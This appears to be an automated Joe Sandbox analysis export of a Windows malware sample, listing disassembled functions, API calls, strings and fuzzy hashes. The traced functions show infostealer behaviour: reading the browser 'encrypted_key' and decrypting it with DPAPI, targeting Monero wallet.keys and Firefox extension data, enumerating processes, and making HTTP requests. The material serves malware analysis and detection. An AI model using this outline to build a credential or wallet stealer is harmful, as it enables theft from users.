Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: b33f1d42356666e962adb03694791d82f7e80b9f3c89f751c8085f4ffe551e77
Instruction ID: e9c4341c507bc5c08a4f93dd15eb198634b6f3592e4209d6f61663d46d8803e5
Opcode Fuzzy Hash: b33f1d42356666e962adb03694791d82f7e80b9f3c89f751c8085f4ffe551e77
Instruction Fuzzy Hash: EB8100729105189ADB06FBA4DC96DEE7738BF14301F504219F907BA0A1EF346A0DEB62

Function 0034F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00361580,00360D92), ref: 0034F54C
lstrlen.KERNEL32(00000000), ref: 0034F56B

Strings

moz-extension+++, xrefs: 0034F5AD
^userContextId=4294967295, xrefs: 0034F59C

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 9fcf34f4293625fee8bdb8eaf633634049c6a822f7ef505bad981594bed62cb1
Instruction ID: 36dbaebc4388520166b3d2fccbfa92e985a396b84f61e4612c04282aacb8730c
Opcode Fuzzy Hash: 9fcf34f4293625fee8bdb8eaf633634049c6a822f7ef505bad981594bed62cb1
Instruction Fuzzy Hash: 0D512471D106089ADB05FBB0DC56DED7778AF54301F408628FC16AB1A1EF346A0DEBA2

Function 00349CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D39

Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
Part of subcall function 00349AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
Part of subcall function 00349AC0: LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F

Part of subcall function 00349B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
Part of subcall function 00349B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
Part of subcall function 00349B60: LocalFree.KERNEL32(?), ref: 00349BD3

Strings

DPAPI, xrefs: 00349D89
"encrypted_key":", xrefs: 00349D30
, xrefs: 00349DC1

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 6c740644cc5c2c9a5690ee54d8a0f8e2dc5ea48c4ccc2c8c94e4c95fcae1c6d3
Instruction ID: 1af9ad4686251acb9df3ddf3cd23cd5763ef4940a821358366e3142628f03471
Opcode Fuzzy Hash: 6c740644cc5c2c9a5690ee54d8a0f8e2dc5ea48c4ccc2c8c94e4c95fcae1c6d3
Instruction Fuzzy Hash: 60311EB6D10209ABCF15DFE4DC85FEFB7B8AB48304F144519E905AB245EB34AA04CBA1

Function 00358680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003605B7), ref: 003586CA
Process32First.KERNEL32(?,00000128), ref: 003586DE
Process32Next.KERNEL32(?,00000128), ref: 003586F3

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

CloseHandle.KERNEL32(?), ref: 00358761

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
Instruction ID: 884bc5e85d8e1a08c01e7d8ef75084f831d6e7381baa8d3dce71939502e4f497
Opcode Fuzzy Hash: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
Instruction Fuzzy Hash: D0316D71901618ABDB26DF50DC41FEEB778FF49701F104299E90AB61A0EB306A49DFA1

Function 00356AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01278E30,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
CloseHandle.KERNEL32(00000000), ref: 00356AF9
Sleep.KERNEL32(00001770), ref: 00356B04
CloseHandle.KERNEL32(?,00000000,?,01278E30,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
ExitProcess.KERNEL32 ref: 00356B22

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
Instruction ID: 7ca6c2cff937c667f464f8121d166fbb90cf78de86f2f577988831ca61fb0437
Opcode Fuzzy Hash: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
Instruction Fuzzy Hash: 31F05E70944209ABF702ABA0DC0BFBD7B78EB14702F904515BD03F61E1DBB05548EB66

Function 003447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Strings

<, xrefs: 003447C9

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 0c6674447d31e4f6bec6713d1ccbff7a9159cfc814fb7f23ee93da58742bfa0c
Instruction ID: 626f0b4a41d427d6e97de56252346aaf5ff4f8bc8bb7a894aba89cff26dc5502
Opcode Fuzzy Hash: 0c6674447d31e4f6bec6713d1ccbff7a9159cfc814fb7f23ee93da58742bfa0c
Instruction Fuzzy Hash: 51214FB1D00208ABDF14DFA4E845ADD7B74FB44321F108625F915AB2D0EB706A09DF92

Function 003551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 00346280: InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
Part of subcall function 00346280: StrCmpCA.SHLWAPI(?,0127E768), ref: 00346303
Part of subcall function 00346280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
Part of subcall function 00346280: HttpOpenRequestA.WININET(00000000,GET,?,0127DFF8,00000000,00000000,00400100,00000000), ref: 00346385
Part of subcall function 00346280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
Part of subcall function 00346280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228

Strings

ERROR, xrefs: 0035521A
ERROR, xrefs: 00355273

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
Instruction ID: 25dc88a6e1770f70b723a7171814f03509e4affc678b48b4256841f97a937995
